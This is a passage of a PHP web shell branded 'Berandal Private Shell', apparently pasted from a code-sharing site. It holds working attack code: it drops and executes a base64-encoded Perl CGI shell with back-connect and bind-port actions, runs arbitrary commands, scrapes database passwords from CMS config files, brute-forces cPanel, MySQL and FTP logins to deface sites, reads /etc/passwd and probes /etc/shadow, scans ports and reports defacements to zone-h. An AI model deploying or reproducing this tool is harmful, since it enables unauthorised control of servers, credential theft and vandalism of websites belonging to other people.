NobW9kJ30pOwoJCQkkZmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kVHJhbnNmZXJGaWxlOwoJCQljaG9wKCRyZXN1bHQ9IGBjaG1vZCAkY2htb2QgIiRmaWxlImApOwoJCQlpZigmdHJpbSgkcmVzdWx0KSBlcSAiIikKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CgkJfQoJfQoJJHJlbmFtZT0kaW57J3JlbmFtZSd9OwoJaWYoISRyZW5hbWUgZXEgIiIpCgl7CgkJaWYocmVuYW1lKCRUcmFuc2ZlckZpbGUsJHJlbmFtZSkpCgkJewoJCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7CgkJfWVsc2UKCQl7CgkJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7CgkJfQoJfQoJJHJlbW92ZT0kaW57J3JlbW92ZSd9OwoJaWYoJHJlbW92ZSBuZSAiIikKCXsKCQkkcm0gPSAkQ3VycmVudERpci4kUGF0aFNlcC4kcmVtb3ZlOwoJCWlmKC1kICRybSkKCQl7CgkJCSZSbURpcigkcm0pOwoJCX1lbHNlCgkJewoJCQlpZih1bmxpbmsoJHJtKSkKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CQkJCgkJfQoJfQoJcHJpbnQgJkxpc3REaXI7Cgp9CmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKQkJCQkgCSMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kCnsKCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCXByaW50ICZFeGVjdXRlQ29tbWFuZDsKfQplbHNpZigkQWN0aW9uIGVxICJzYXZlIikJCQkJIAkjIHVzZXIgd2FudHMgdG8gc2F2ZSBhIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCZTYXZlRmlsZSgkaW57J2RhdGEnfSwkaW57J2ZpbGUnfSkpCgl7CgkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJfWVsc2UKCXsKCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJfQoJcHJpbnQgJkxpc3REaXI7Cn0KZWxzaWYoJEFjdGlvbiBlcSAidXBsb2FkIikgCQkJCQkjIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoKCXByaW50ICZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImJhY2tiaW5kIikgCQkJCSMgdXNlciB3YW50cyB0byBiYWNrIGNvbm5lY3Qgb3IgYmluZCBwb3J0CnsKCSZQcmludFBhZ2VIZWFkZXIoImNsaWVudHBvcnQiKTsKCXByaW50ICZCYWNrQmluZDsKfQplbHNpZigkQWN0aW9uIGVxICJicnV0ZWZvcmNlciIpIAkJCSMgdXNlciB3YW50cyB0byBicnV0ZSBmb3JjZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJkJydXRlRm9yY2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAJCQkJIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CglwcmludCAmRG93bmxvYWRGaWxlOwp9ZWxzaWYoJEFjdGlvbiBlcSAiY2hlY2tsb2ciKSAJCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbG9nIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCXByaW50ICZWaWV3TG9nOwoKfWVsc2lmKCRBY3Rpb24gZXEgImRvbWFpbnN1c2VyIikgCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbGlzdCB1c2VyL2RvbWFpbgp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJlZpZXdEb21haW5Vc2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAibG9nb3V0IikgCQkJCSMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0KJlByaW50UGFnZUZvb3Rlcjs=';
  1539.  
  1540. $file = fopen("cgi2012.izo" ,"w+");
  1541. $write = fwrite ($file ,base64_decode($cgi2012));
  1542. fclose($file);
  1543.     chmod("cgi2012.izo",0755);
  1544.    echo " <iframe src=cgi2012/cgi2012.izo width=96% height=76% frameborder=0></iframe>
  1545.  
  1546.  </div>"; }
  1547. elseif($_GET['666'] == '64base') {
  1548.    
  1549. echo '<div style="text-align:left" class="mybox"><h1>Base64 Encode/Decoder</h1>
  1550. <form action="" method=POST>
  1551. Encode :<input type=text name=code style="border:0;border-bottom:1px solid #292929; width:500px;"><br><br>
  1552. <input type=submit style="width: 50px; height: 30px; border-color=white;" name=codificar class="kotak" value=Encode>
  1553. </form><hr color="white"><br>
  1554. <form action="" method=POST>
  1555. Decode :<input type=text name=decode style="border:0;border-bottom:1px solid #292929; width:500px;"><br><br>
  1556. <input type=submit style="width: 50px; height: 30px; border-color=white;" name=decodificar class="kotak" value=Decode>
  1557. </form></div>
  1558. ';
  1559.    
  1560.     if (isset($_POST['codificar'])) {
  1561.         echo "<div class='mybox'><center>";
  1562.         echo "Text<br><br><fieldset style='border-color:white'>" . $_POST['code'] . "</fieldset><br><br>Result<br><br><fieldset style='border-color:white'>";
  1563.         echo base64_encode($_POST['code']);
  1564.         echo "</fieldset></center></div>";
  1565.     }
  1566.     if (isset($_POST['decodificar'])) {
  1567.         echo "<div class='mybox'><center><br><br>Text<br><br><fieldset style='border-color:white'>" . $_POST['decode'] . "</fieldset><br><br>Result<br><br><fieldset style='border-color:white'>";
  1568.         echo base64_decode($_POST['decode']);
  1569.         echo "</fieldset></Center></div>";
  1570.   }  
  1571. }
  1572. elseif($_GET['666'] == 'string'){
  1573. $text = $_POST['code'];
  1574. ?><center class='mybox'><h1>String Encode & Decode</h1>
  1575. <form method="post"><br>
  1576. <textarea class='mybox' cols=80 rows=10 name="code"></textarea><br><br>
  1577. <select size="1" name="ope">
  1578. <option value="urlencode" style='background:transparent;color:aqua;'>url</option>
  1579. <option value="base64" style='background:transparent;color:aqua;'>Base64</option>
  1580. <option value="ur" style='background:transparent;color:aqua;'>convert_uu</option>
  1581. <option value="json" style='background:transparent;color:aqua;'>json</option>
  1582. <option value="gzinflates" style='background:transparent;color:aqua;'>gzinflate - base64</option>
  1583. <option value="str2" style='background:transparent;color:aqua;'>str_rot13 - base64</option>
  1584. <option value="gzinflate" style='background:transparent;color:aqua;'>str_rot13 - gzinflate - base64</option>
  1585. <option value="gzinflater" style='background:transparent;color:aqua;'>gzinflate - str_rot13 - base64</option>
  1586. <option value="gzinflatex" style='background:transparent;color:aqua;'>gzinflate - str_rot13 - gzinflate - base64</option>
  1587. <option value="gzinflatew" style='background:transparent;color:aqua;'>str_rot13 - convert_uu - url - gzinflate - str_rot13 - base64 - convert_uu - gzinflate - url - str_rot13 - gzinflate - base64</option>
  1588. <option value="str" style='background:transparent;color:aqua;'>str_rot13 - gzinflate - str_rot13 - base64</option>
  1589. <option value="url" style='background:transparent;color:aqua;'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  1590. <option value="hexencode" style='background:transparent;color:aqua;'>Hex Encode/Decode</option>
  1591. <option value="md5" style='background:transparent;color:aqua;'><center>MD5 Hash</option>
  1592. <option value="sha1" style='background:transparent;color:aqua;'>SHA1 Hash</option>
  1593. <option value="str_rot13" style='background:transparent;color:aqua;'>ROT13 Hash</option>
  1594. <option value="strlen" style='background:transparent;color:aqua;'>strlen</option>
  1595. <option value="xxx" style='background:transparent;color:aqua;'>unescape</option>
  1596. <option value="bbb" style='background:transparent;color:aqua;'>charAt</option>
  1597. <option value="aaa" style='background:transparent;color:aqua;'>chr - bin2hex - substr</option>
  1598. <option value="www" style='background:transparent;color:aqua;'>chr</option>
  1599. <option value="sss" style='background:transparent;color:aqua;'>htmlspecialchars</option>
  1600. <option value="eee" style='background:transparent;color:aqua;'>escape</option></select>&nbsp;
  1601. <input class='kotak' type='submit' name='submit' value='Encrypt'>
  1602. <input class='kotak' type='submit' name='crack' value='Decrypt'>
  1603. </form>
  1604.  
  1605. <?php
  1606. $submit = $_POST['submit'];
  1607. if (isset($submit)){
  1608. $op = $_POST["ope"];
  1609. switch ($op) {case 'base64': $codi=base64_encode($text);
  1610. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  1611. break;case 'json' : $codi=json_encode(utf8_encode($text));
  1612. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  1613. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  1614. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  1615. break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
  1616. break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
  1617. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  1618. break;case 'urlencode' : $codi=rawurlencode($text);
  1619. break;case 'hexencode' : $codi=bin2hex($text);
  1620. break;case 'md5' : $codi=md5($text);
  1621. break;case 'ur' : $codi=convert_uuencode($text);
  1622. break;case 'str_rot13' : $codi=str_rot13($text);
  1623. break;case 'sha1' : $codi=sha1($text);
  1624. break;case 'strlen' : $codi=strlen($text);
  1625. break;case 'xxx' : $codi=strlen(bin2hex($text));
  1626. break;case 'bbb' : $codi=htmlentities(utf8_decode($text));
  1627. break;case 'aaa' : $codi=chr(bin2hex(substr($text)));
  1628. break;case 'www' : $codi=chr($text);
  1629. break;case 'sss' : $codi=htmlspecialchars($text);
  1630. break;case 'eee' : $codi=addslashes($text);
  1631. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  1632. break;default:break;}}
  1633. // Decrypt Start Now !!
  1634. $submit = $_POST['crack'];
  1635. if (isset($submit)){
  1636. $op = $_POST["ope"];
  1637. switch ($op) {case 'base64': $codi=base64_decode($text);
  1638. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  1639. break;case 'json' : $codi=utf8_dencode(json_dencode($text));
  1640. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  1641. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  1642. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
  1643. break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
  1644. break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
  1645. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  1646. break;case 'urlencode' : $codi=rawurldecode($text);
  1647. break;case 'hexencode' : $codi=quoted_printable_decode($text);
  1648. break;case 'ur' : $codi=convert_uudecode($text);
  1649. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  1650. break;default:break;}}
  1651. echo '<textarea cols=80 rows=10 class="mybox" readonly>'.$codi.'</textarea></center><BR><BR>';
  1652. }
  1653. elseif($_GET['666'] == 'cmd') {
  1654.     echo "<div class='mybox'>
  1655.     <form method='post'>
  1656.     <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  1657.     <input type='text' size='30' height='10' style='border:0; border-bottom: 1px solid #191919' name='cmd'><input type='submit'  style='border-color=white'name='do_cmd' class='kotak' value='>>'>
  1658.     </form></div>";
  1659.     if($_POST['do_cmd']) {
  1660.         echo "<pre>".exe($_POST['cmd'])."</pre><br>";
  1661.         echo "<hr color='white'>";
  1662.        
  1663.     }
  1664. }
  1665. elseif($_GET['666'] == 'cpdepes') {
  1666.     if($_POST['crack']) {
  1667.         $usercp = explode("\r\n", $_POST['user_cp']);
  1668.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1669.         $i = 0;
  1670.         foreach($usercp as $ucp) {
  1671.             foreach($passcp as $pcp) {
  1672.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1673.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1674.                     } else {
  1675.                         $_SESSION[$ucp] = "1";
  1676.                         $_SESSION[$pcp] = "1";
  1677.                         if($ucp == '' || $pcp == '') {
  1678.                             //
  1679.                         } else {
  1680.                             echo "[+] username (<font color=red>$ucp</font>) password (<font color=red>$pcp</font>)<br>";
  1681.                             $ftp_conn = ftp_connect($ip);
  1682.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1683.                             if((!$ftp_login) || (!$ftp_conn)) {
  1684.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  1685.                             } else {
  1686.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
  1687.                                 $fi = htmlspecialchars($_POST['file_deface']);
  1688.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1689.                                 if($deface) {
  1690.                                     $i++;
  1691.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
  1692.                                     if(function_exists('posix_getpwuid')) {
  1693.                                         $domain_cp = file_get_contents("/etc/named.conf");
  1694.                                         if($domain_cp == '') {
  1695.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1696.                                         } else {
  1697.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1698.                                             foreach($domains_cp[1] as $dj) {
  1699.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1700.                                                 $user_cp_url = $user_cp_url['name'];
  1701.                                                 if($user_cp_url == $ucp) {
  1702.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1703.                                                     break;
  1704.                                                 }
  1705.                                             }
  1706.                                         }
  1707.                                     } else {
  1708.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1709.                                     }
  1710.                                 } else {
  1711.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  1712.                                 }
  1713.                             }
  1714.                             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1715.                         }
  1716.                     }
  1717.                 }
  1718.             }
  1719.         }
  1720.         if($i == 0) {
  1721.         } else {
  1722.             echo "<br>sukses deface ".$i." Cpanel by <font color=red>Berandal Private Shell</font>";
  1723.         }
  1724.     } else {
  1725.         echo "<center class='mybox'><h1>Cpanel Auto Deface</h1><hr color='white'>
  1726.         <form method='post'>
  1727.         Filename: <br>
  1728.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1729.         Deface Page: <br>
  1730.         <input type='text' name='deface' placeholder='http://127.0.0.1/filemu.php' style='width: 450px;'><br>
  1731.         USER: <br>
  1732.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1733.         $_usercp = fopen("/etc/passwd","r");
  1734.         while($getu = fgets($_usercp)) {
  1735.             if($getu == '' || !$_usercp) {
  1736.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1737.             } else {
  1738.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1739.                 foreach($u[1] as $user_cp) {
  1740.                         if(is_dir("/home/$user_cp/public_html")) {
  1741.                             echo "$user_cp\n";
  1742.                     }
  1743.                 }
  1744.             }
  1745.         }
  1746.         echo "</textarea><br>
  1747.         PASS: <br>
  1748.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1749.         function cp_pass($dir) {
  1750.             $pass = "";
  1751.             $dira = scandir($dir);
  1752.             foreach($dira as $dirb) {
  1753.                 if(!is_file("$dir/$dirb")) continue;
  1754.                 $ambil = file_get_contents("$dir/$dirb");
  1755.                 if(preg_match("/WordPress/", $ambil)) {
  1756.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1757.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1758.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  1759.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1760.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1761.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1762.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  1763.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1764.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1765.                 } elseif(preg_match("/client/", $ambil)) {
  1766.                     preg_match("/password=(.*)/", $ambil, $pass1);
  1767.                     if(preg_match('/"/', $pass1[1])) {
  1768.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1769.                         $pass .= $pass1[1]."\n";
  1770.                     }
  1771.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1772.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1773.                 }
  1774.             }
  1775.             echo $pass;
  1776.         }
  1777.         $cp_pass = cp_pass($dir);
  1778.         echo $cp_pass;
  1779.         echo "</textarea><br>
  1780.         <input type='submit' name='crack' style='width: 450px;' value='SIKAT!'>
  1781.         </form>
  1782.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1783.     }
  1784. }
  1785. elseif($_GET['666'] == 'port') {
  1786.     echo '<div style="text-align:left" class="mybox"><table><tr><h1>Port Scanner</h1><hr color="white"><td>';
  1787.     echo '<div class="content">';
  1788.     echo '<form action="" method="post">';
  1789.    
  1790.     if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  1791.         $start = strip_tags($_POST['start']);
  1792.         $end = strip_tags($_POST['end']);
  1793.         $host = strip_tags($_POST['host']);
  1794.         for($i = $start; $i<=$end; $i++){
  1795.             $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  1796.             if($fp){
  1797.                 echo 'Port '.$i.' is <font color=green>open</font><br>';
  1798.             }
  1799.             flush();
  1800.         }
  1801.     } else {
  1802.         echo '<input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
  1803.               <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  1804.               <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  1805.               Host: &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type="text" style="border:0;border-bottom:1px solid #292929; width:500px;" name="host" value="localhost"/><br /><br />
  1806.               Port Start: &nbsp<input type="text" style="border:0;border-bottom:1px solid #292929; width:500px;" name="start" value="0"/><br /><br />
  1807.               Port End:&nbsp&nbsp&nbsp&nbsp<input type="text" style="border:0;border-bottom:1px solid #292929; width:500px;" name="end" value="5000"/><br /><br />
  1808.               <input type="submit" style="width: 100px; height: 30px; border-color=white;margin:10px 2px 0 2px;" value="Scan Ports !" />
  1809.               </form>';
  1810.     echo '</div></table></td></div>';
  1811.     }
  1812. }
  1813. elseif($_GET['666'] == 'zip') {
  1814.     echo "<div class='mybox'>";
  1815.     echo "<h1>Zip Menu</h1><hr color='white'>";
  1816. function rmdir_recursive($dir) {
  1817.     foreach(scandir($dir) as $file) {
  1818.        if ('.' === $file || '..' === $file) continue;
  1819.        if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  1820.        else unlink("$dir/$file");
  1821.    }
  1822.    rmdir($dir);
  1823. }
  1824. if($_FILES["zip_file"]["name"]) {
  1825.     $filename = $_FILES["zip_file"]["name"];
  1826.     $source = $_FILES["zip_file"]["tmp_name"];
  1827.     $type = $_FILES["zip_file"]["type"];
  1828.     $name = explode(".", $filename);
  1829.     $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  1830.     foreach($accepted_types as $mime_type) {
  1831.         if($mime_type == $type) {
  1832.             $okay = true;
  1833.             break;
  1834.         }
  1835.     }
  1836.     $continue = strtolower($name[1]) == 'zip' ? true : false;
  1837.     if(!$continue) {
  1838.         $message = "Itu Bukan Zip  , , GOBLOK COK";
  1839.     }
  1840.   $path = dirname(__FILE__).'/';
  1841.   $filenoext = basename ($filename, '.zip');
  1842.   $filenoext = basename ($filenoext, '.ZIP');
  1843.   $targetdir = $path . $filenoext;
  1844.   $targetzip = $path . $filename;
  1845.   if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
  1846.   mkdir($targetdir, 0777);
  1847.     if(move_uploaded_file($source, $targetzip)) {
  1848.         $zip = new ZipArchive();
  1849.         $x = $zip->open($targetzip);
  1850.         if ($x === true) {
  1851.             $zip->extractTo($targetdir);
  1852.             $zip->close();
  1853.  
  1854.             unlink($targetzip);
  1855.         }
  1856.         $message = "<b>Sukses Cok :)</b>";
  1857.     } else {    
  1858.         $message = "<b>Error Jancok :(</b>";
  1859.     }
  1860. }  
  1861. echo '<table style="width:100%" border="1">
  1862. <div class="mybox"><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  1863. <label>Zip File : <input type="file" name="zip_file" /></label>
  1864. <input type="submit" class="kotak" name="submit" value="Upload And Unzip" />
  1865. </form><br><br></div>';
  1866. if($message) echo "<p>$message</p>";
  1867. echo "<div class='mybox'><h2>Zip Backup</h2>
  1868. <form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br>
  1869. <input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><br>
  1870. <font style='text-decoration: underline;'>Save To:</font><br>
  1871. <input type='text' name='save' value='$dir/berandal_backup.zip' style='width: 450px;' height='10'><br><br>
  1872. <input type='submit' name='backup' class='kotak' value='Back Up!' style='width: 215px;'></form><br><br></div>";
  1873.     if($_POST['backup']){
  1874.     $save=$_POST['save'];
  1875.     function Zip($source, $destination)
  1876. {
  1877.     if (extension_loaded('zip') === true)
  1878.     {
  1879.         if (file_exists($source) === true)
  1880.         {
  1881.             $zip = new ZipArchive();
  1882.  
  1883.             if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1884.             {
  1885.                 $source = realpath($source);
  1886.  
  1887.                 if (is_dir($source) === true)
  1888.                 {
  1889.                     $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1890.  
  1891.                     foreach ($files as $file)
  1892.                     {
  1893.                         $file = realpath($file);
  1894.  
  1895.                         if (is_dir($file) === true)
  1896.                         {
  1897.                             $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1898.                         }
  1899.  
  1900.                         else if (is_file($file) === true)
  1901.                         {
  1902.                             $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1903.                         }
  1904.                     }
  1905.                 }
  1906.  
  1907.                 else if (is_file($source) === true)
  1908.                 {
  1909.                     $zip->addFromString(basename($source), file_get_contents($source));
  1910.                 }
  1911.             }
  1912.  
  1913.             return $zip->close();
  1914.         }
  1915.     }
  1916.  
  1917.     return false;
  1918. }
  1919.     Zip($_POST['dir'],$save);
  1920.     echo "Selese , Save To <b>$save</b>";
  1921.     }
  1922.     echo "
  1923.     <div class='mybox'><h2>Unzip Manual</h2>
  1924.     <form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br>
  1925.     <input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><br>
  1926.     <font style='text-decoration: underline;'>Save To:</font><br>
  1927.     <input type='text' name='save' value='$dir/berandal_unzip' style='width: 450px;' height='10'><br><br>
  1928.     <input type='submit' name='extrak' class='kotak' value='Unzip!' style='width: 215px;'></form><br><br>
  1929.     </div>";
  1930.     if($_POST['extrak']){
  1931.     $save=$_POST['save'];
  1932.     $zip = new ZipArchive;
  1933.     $res = $zip->open($_POST['dir']);
  1934.     if ($res === TRUE) {
  1935.         $zip->extractTo($save);
  1936.         $zip->close();
  1937.     echo 'Succes , Location : <b>'.$save.'</b>';
  1938.     } else {
  1939.     echo 'Gagal Cok :( Ntahlah !';
  1940.     }
  1941.     }
  1942. echo '</table>';
  1943. echo "</div>";
  1944. ;}
  1945. elseif($_GET['666'] == 'metu') {
  1946.    
  1947.  
  1948. echo '<form action="?dir=$dir&do=metu" method="post">';
  1949.     unset($_SESSION[sha1($_SERVER['HTTP_HOST'])]);
  1950.     echo 'See ya! :P ';  
  1951. }
  1952. elseif($_GET['666'] == 'infosec') {
  1953. echo '<div class="mybox"><table><h1><u>Server security information</u></h1><td><div class=content>';
  1954.     function showSecParam($n, $v) {
  1955.         $v = trim($v);
  1956.         if($v) {
  1957.             echo '<span>'.$n.': </span>';
  1958.             if(strpos($v, "\n") === false)
  1959.                 echo $v.'<br>';
  1960.             else
  1961.                 echo '<pre class=ml1>'.$v.'</pre>';
  1962.         }
  1963.     }
  1964.    
  1965.     showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  1966.     showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
  1967.     showSecParam('Open base dir', @ini_get('open_basedir'));
  1968.     showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  1969.     showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  1970.     showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  1971.     $temp=array();
  1972.     if(function_exists('mysql_get_client_info'))
  1973.         $temp[] = "MySql (".mysql_get_client_info().")";
  1974.     if(function_exists('mssql_connect'))
  1975.         $temp[] = "MSSQL";
  1976.     if(function_exists('pg_connect'))
  1977.         $temp[] = "PostgreSQL";
  1978.     if(function_exists('oci_connect'))
  1979.         $temp[] = "Oracle";
  1980.     showSecParam('Supported databases', implode(', ', $temp));
  1981.     echo '<br>';
  1982.    
  1983.     if( $GLOBALS['os'] == 'nix' ) {
  1984.         $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  1985.         $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  1986.         $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  1987.         showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  1988.         showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
  1989.         showSecParam('OS version', @file_get_contents('/proc/version'));
  1990.         showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  1991.         if(!$GLOBALS['safe_mode']) {
  1992.             echo '<br>';
  1993.             $temp=array();
  1994.             foreach ($userful as $item)
  1995.                 if(which($item)){$temp[]=$item;}
  1996.             showSecParam('Userful', implode(', ',$temp));
  1997.             $temp=array();
  1998.             foreach ($danger as $item)
  1999.                 if(which($item)){$temp[]=$item;}
  2000.             showSecParam('Danger', implode(', ',$temp));
  2001.             $temp=array();
  2002.             foreach ($downloaders as $item)
  2003.                 if(which($item)){$temp[]=$item;}
  2004.             showSecParam('Downloaders', implode(', ',$temp));
  2005.             echo '<br/>';
  2006.             showSecParam('Hosts', @file_get_contents('/etc/hosts'));
  2007.             showSecParam('HDD space', ex('df -h'));
  2008.             showSecParam('Mount options', @file_get_contents('/etc/fstab'));
  2009.         }
  2010.     } else {
  2011.         showSecParam('OS Version',ex('ver'));
  2012.         showSecParam('Account Settings',ex('net accounts'));
  2013.         showSecParam('User Accounts',ex('net user'));
  2014.     }
  2015.     echo '</div></th></table>';
  2016.     echo '</div></th></table>';
  2017.     echo "</div>";
  2018. }
  2019. elseif($_GET['666'] == 'zoneh') {
  2020.     if($_POST['submit']) {
  2021.         $domain = explode("\r\n", $_POST['url']);
  2022.         $nick =  $_POST['nick'];
  2023.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  2024.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  2025.         function zoneh($url,$nick) {
  2026.             $ch = curl_init("http://www.zone-h.com/notify/single");
  2027.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2028.                   curl_setopt($ch, CURLOPT_POST, true);
  2029.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  2030.             return curl_exec($ch);
  2031.                   curl_close($ch);
  2032.         }
  2033.         foreach($domain as $url) {
